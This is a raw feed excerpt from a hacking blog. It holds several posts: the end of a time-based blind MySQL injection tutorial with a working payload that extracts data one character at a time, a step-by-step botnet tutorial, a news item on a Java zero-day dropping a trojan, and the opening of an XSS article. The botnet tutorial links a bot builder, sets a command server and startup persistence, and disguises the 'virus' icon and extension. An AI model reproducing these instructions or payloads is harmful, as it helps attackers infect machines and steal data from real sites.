&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;u&gt;Get the data mode!&lt;/u&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;b&gt;&lt;i&gt;pic_id=13 and if((select mid(column_name,1,1) from table_name limit 0,1)='a',sleep(5),1)--&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
So,if the 1st character of data at the right column_name in the right table_name = 'a', the server will delayed for 5 seconds.&amp;nbsp;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
And then proceed to test the 2nd,3rd char and so on..&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-pZ8QUX-rbio/UTazS0McuSI/AAAAAAAAAY0/7nJXOpRhPBY/s1600/6.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="348" src="http://4.bp.blogspot.com/-pZ8QUX-rbio/UTazS0McuSI/AAAAAAAAAY0/7nJXOpRhPBY/s640/6.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
The image shown that the username=admin..so is it correct?lets double check it&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-tsa38cZ7yIQ/UTazS76nc_I/AAAAAAAAAYw/2WJmntX29lg/s1600/7.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="166" src="http://2.bp.blogspot.com/-tsa38cZ7yIQ/UTazS76nc_I/AAAAAAAAAYw/2WJmntX29lg/s400/7.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
Yeahhh.its correct.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
That's all for now!&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
Thanks,&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
@yappare&lt;/div&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NXreh1y6Rdc:4-rRSOfqsIc:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NXreh1y6Rdc:4-rRSOfqsIc:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NXreh1y6Rdc:4-rRSOfqsIc:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=NXreh1y6Rdc:4-rRSOfqsIc:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NXreh1y6Rdc:4-rRSOfqsIc:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=NXreh1y6Rdc:4-rRSOfqsIc:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NXreh1y6Rdc:4-rRSOfqsIc:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NXreh1y6Rdc:4-rRSOfqsIc:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=NXreh1y6Rdc:4-rRSOfqsIc:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NXreh1y6Rdc:4-rRSOfqsIc:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=NXreh1y6Rdc:4-rRSOfqsIc:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/NXreh1y6Rdc" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/4414845610786175504/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/mysql-injection-time-based.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4414845610786175504?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4414845610786175504?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/NXreh1y6Rdc/mysql-injection-time-based.html" title="MySQL Injection Time Based" /><author><name>Rafay Baloch</name><uri>https://plus.google.com/113902000528448760189</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh4.googleusercontent.com/-QFpq0g9Pn_g/AAAAAAAAAAI/AAAAAAAACjo/gm2BoL3un_A/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-Pc_svnUIZhI/USJpoZHt2PI/AAAAAAAACmw/IbCcBiXiKNo/s72-c/sqlinjection+(1).jpg" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/mysql-injection-time-based.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DE4CQnk7eCp7ImA9WhBQEUQ.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-9061278541844143594</id><published>2013-03-04T14:10:00.000-08:00</published><updated>2013-03-13T10:49:23.700-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-13T10:49:23.700-07:00</app:edited><title>How Hackers Make Botnets To Infect Systems [Part 2]</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://oi48.tinypic.com/286wpvq.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://oi48.tinypic.com/286wpvq.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span id="goog_1986115820"&gt;&lt;/span&gt;&lt;span id="goog_1986115821"&gt;&lt;/span&gt;&lt;br /&gt;
Hello RHA readers, we are back with How To Setup A Botnet [Tutorial For Noobs] [Part 2]. Those who haven't read previous part than check the first part in order to understand part two, as it is the sequel of How to setup a Botnet.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2013/03/how-to-setup-botnet-tutorial-for-noobs.html" target="_blank"&gt;Part 1: How To Setup A Botnet [Tutorial For Noobs] [Part 1]&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;So in this part we will teach you how to setup a Botnet.&lt;br /&gt;
&lt;h4&gt;
Step 1:&lt;/h4&gt;
Now after hosting the server, Extract Bot builder in you computer.&lt;br /&gt;
Download it from here http://www.mediafire.com/?hb9ou6g50a620nb &lt;br /&gt;
&lt;h4&gt;
Step 2:&lt;/h4&gt;
After extracting, you'll a application for BOT Building with 'VNBuilder' name.&lt;br /&gt;
Run the application.&lt;br /&gt;
It would be like as shown in image:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://oi48.tinypic.com/1538f3q.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="267" src="http://oi48.tinypic.com/1538f3q.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h4&gt;
&amp;nbsp;step 3:&lt;/h4&gt;
Check the box in the below.&lt;br /&gt;
&lt;h4&gt;
Step 4:&lt;/h4&gt;
Now go in the 'Web Setting' Tab. Type the website where you have set 
your server in ROOT WEBSITE URL column. Remember your website url should
 be like www.yourwebsite.com this, No Http:// in starting. Leave the 
port number as it is. Now type the folder in which your server is set, 
And it should be like /folder name/. leave All other thing as it is. As 
it is shown in image: &lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://oi49.tinypic.com/2e51s1y.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="261" src="http://oi49.tinypic.com/2e51s1y.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h4&gt;
&amp;nbsp;Step 5:&lt;/h4&gt;
Now Go to Load settings tab, check the 'INSTALL LOADER TO START UP' option. Like in the image:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://oi48.tinypic.com/14wv9k9.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="264" src="http://oi48.tinypic.com/14wv9k9.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h4&gt;
Step 6:&lt;/h4&gt;
Proceed to last Tab BUILD LOADER, Now if you want to change icon of your virus than go to top right of under build loader tab, You can add icons their for your virus, additional icons are given with builder. You can even change the extention from .exe to .bat and few others, In the bottom of window you can find option to change extension. Now In the last click Build. &lt;br /&gt;
Builder will ask where to save with which name, provide your desire one. &lt;br /&gt;
&lt;h4&gt;
Step 7:&lt;/h4&gt;
You've successfully created Bot. Now in order to check whether the bot 
is working or not RUN it in you Computer, Turn your antivirus It'll 
detect the virus. After running virus, go and login in the server you 
made in part one of this tutorial. If your virus is created Successfully
 than you IP will be appearing in the server list with your computer 
name. Like mine:&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://oi45.tinypic.com/1231non.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="212" src="http://oi45.tinypic.com/1231non.jpg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
If your Ip appearing, than you have configured Botnet successfully. Congratulations.&lt;br /&gt;
Thanks for reading, Stay tuned with us for more tutorials!&lt;br /&gt;
&lt;br /&gt;
&lt;h4&gt;
About The Author&lt;/h4&gt;
&lt;br /&gt;
This article has been written by Fahad awan, Who has recently joined RHA's team, We wish him best of luck and hope that he enjoys working for RHA.&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=3KaTZlVAWbY:qBnQX4Njqgs:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=3KaTZlVAWbY:qBnQX4Njqgs:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=3KaTZlVAWbY:qBnQX4Njqgs:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=3KaTZlVAWbY:qBnQX4Njqgs:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=3KaTZlVAWbY:qBnQX4Njqgs:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=3KaTZlVAWbY:qBnQX4Njqgs:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=3KaTZlVAWbY:qBnQX4Njqgs:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=3KaTZlVAWbY:qBnQX4Njqgs:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=3KaTZlVAWbY:qBnQX4Njqgs:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=3KaTZlVAWbY:qBnQX4Njqgs:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=3KaTZlVAWbY:qBnQX4Njqgs:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/3KaTZlVAWbY" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/9061278541844143594/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/how-to-setup-botnet-tutorial-for-noobs_4.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/9061278541844143594?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/9061278541844143594?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/3KaTZlVAWbY/how-to-setup-botnet-tutorial-for-noobs_4.html" title="How Hackers Make Botnets To Infect Systems [Part 2]" /><author><name>FaHaD aWaN</name><uri>http://www.blogger.com/profile/11388036707127075893</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>1</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/how-to-setup-botnet-tutorial-for-noobs_4.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkAESHo_eSp7ImA9WhBRE0U.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-944568494266277642</id><published>2013-03-04T00:06:00.000-08:00</published><updated>2013-03-04T01:18:29.441-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-04T01:18:29.441-08:00</app:edited><title>Another Java Zero-Day Vulnerability Spotted In The Wild</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-xeEZW5thXC8/UTRUfCwYDdI/AAAAAAAAA_w/XDA-LwYoC2o/s1600/Java_Bullet.jpg" imageanchor="1"&gt;&lt;img border="0" height="378" src="http://3.bp.blogspot.com/-xeEZW5thXC8/UTRUfCwYDdI/AAAAAAAAA_w/XDA-LwYoC2o/s320/Java_Bullet.jpg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
So, you thought you were out of the woods with Java? Bad news. You aren't. Another Java zero-day vulnerability has been found in the wild by &lt;b&gt;FireEye&lt;/b&gt;.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Java v1.6 and Java v1.7 Update 15 on browsers are being targeted this time around. The previously unknown and unpatched vulnerability exploits browsers to install a remote-access trojan named McRat.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
McRat is a Windows Trojan therefore Windows users are prone to such an attack. It is not clear whether Mac and Linux users are at risk as well.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;According to FireEye researchers;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;span style="background-color: white; color: #222222; line-height: 25px; text-align: -webkit-auto;"&gt;&lt;span style="font-family: inherit;"&gt;&lt;i&gt;We have notified Oracle and will continue to work with Oracle on this in-the-wild discovery. Since this exploit affects the latest Java 6u41 and Java 7u15 versions, we urge users to disable Java in your browser until a patch has been released; alternatively, set your Java security settings to 'High' and do not execute any unknown Java applets outside of your organization.&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;div&gt;
&lt;span style="background-color: white; color: #222222; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 15px; line-height: 25px; text-align: -webkit-auto;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
If you are a Windows user and fear such an attack, we would suggest an uninstallation of Java because, as yet, there are no solutions to this problem.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
The next security updates are scheduled for 16th April but Oracle will be forced to push an Emergency update in the light of current events.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Cheers!&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;About the Author:&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.&lt;/div&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=TP5RYhhO8xc:0iSwkZ9GqvM:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=TP5RYhhO8xc:0iSwkZ9GqvM:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=TP5RYhhO8xc:0iSwkZ9GqvM:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=TP5RYhhO8xc:0iSwkZ9GqvM:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=TP5RYhhO8xc:0iSwkZ9GqvM:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=TP5RYhhO8xc:0iSwkZ9GqvM:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=TP5RYhhO8xc:0iSwkZ9GqvM:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=TP5RYhhO8xc:0iSwkZ9GqvM:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=TP5RYhhO8xc:0iSwkZ9GqvM:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=TP5RYhhO8xc:0iSwkZ9GqvM:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=TP5RYhhO8xc:0iSwkZ9GqvM:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/TP5RYhhO8xc" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/944568494266277642/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/java-zero-day-vulnerability-spotted-in.html#comment-form" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/944568494266277642?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/944568494266277642?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/TP5RYhhO8xc/java-zero-day-vulnerability-spotted-in.html" title="Another Java Zero-Day Vulnerability Spotted In The Wild" /><author><name>Dr. Sindhia Javed Junejo</name><uri>http://www.blogger.com/profile/01429590087313279750</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://4.bp.blogspot.com/-q7qO-M4AY2E/UIRbUxdSx8I/AAAAAAAAAwE/dUwQNL1DQVk/s220/V_mask.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-xeEZW5thXC8/UTRUfCwYDdI/AAAAAAAAA_w/XDA-LwYoC2o/s72-c/Java_Bullet.jpg" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/java-zero-day-vulnerability-spotted-in.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUEBQXY9fyp7ImA9WhBRE0k.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-2466476468432991309</id><published>2013-03-03T13:42:00.000-08:00</published><updated>2013-03-03T13:54:10.867-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-03T13:54:10.867-08:00</app:edited><title>Exploiting XSS Vulnerabilites With Xenotix</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://oi48.tinypic.com/nprmt3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://oi48.tinypic.com/nprmt3.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h3&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-GB" style="font-size: 18.0pt; line-height: 115%; mso-ansi-language: EN-GB; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;Introduction&lt;/span&gt;&lt;/b&gt;

&lt;/h3&gt;
&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;span lang="EN-GB" style="font-size: 12.0pt; line-height: 115%; mso-ansi-language: EN-GB; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;Cross Site Scripting or XSS vulnerabilities have been
reported and exploited since 1990s. XSS got listed as the top 3&lt;sup&gt;rd&lt;/sup&gt;
Vulnerability in the OWASP 2013 Web application Vulnerabilities list. &lt;/span&gt;&lt;span style="font-size: 11.5pt; line-height: 115%;"&gt;Cross-site scripting (XSS) is a type
of security vulnerability typically found in web applications which allows the
attackers to inject client-side script into web pages viewed by other users.
The execution of the injected code takes place at client side. A cross site
scripting vulnerability can be used by the attacker to bypass the Same Origin
Policy (SOP). In the past, the potentials of XSS vulnerability were not known.
XSS was mainly used for stealing cookies and for temporary or permanent
defacements and was not considered as high risk vulnerability. But later XSS
tunneling and Payload delivering showed us the potential of XSS Vulnerability.
Most of the large websites like Google, Facebook, Twitter, Microsoft, and
Amazon etc. even now suffers from XSS bugs. That’s a brief introduction about
XSS. &lt;/span&gt;&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;h4 class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 18.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;Some threats due to XSS&lt;/span&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;XSS Tunneling&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;: With XSS Tunnel a hacker will obtain
the traffic between the victim and a webserver.&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;Client side code injection&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;: A hacker can inject malicious codes
and execute them at client side.&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;DOS:&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt; A hacker can perform DOS against a remote
server or against the client itself.&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;Cookie Stealing&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;: A hacker can obtain the session
cookies or tokens of a victim.&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;Malware Spreading&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;: A hacker can spread malwares with a
website which is vulnerable to XSS.&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;Phishing&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;: A hacker can embed or redirect to a
fake page of the website to get the login credentials of the victim.&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;Defacing:&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt; Temporary or permanent defacement of
web application is possible &lt;/span&gt;&lt;/div&gt;
&lt;h4 class="MsoNormal"&gt;
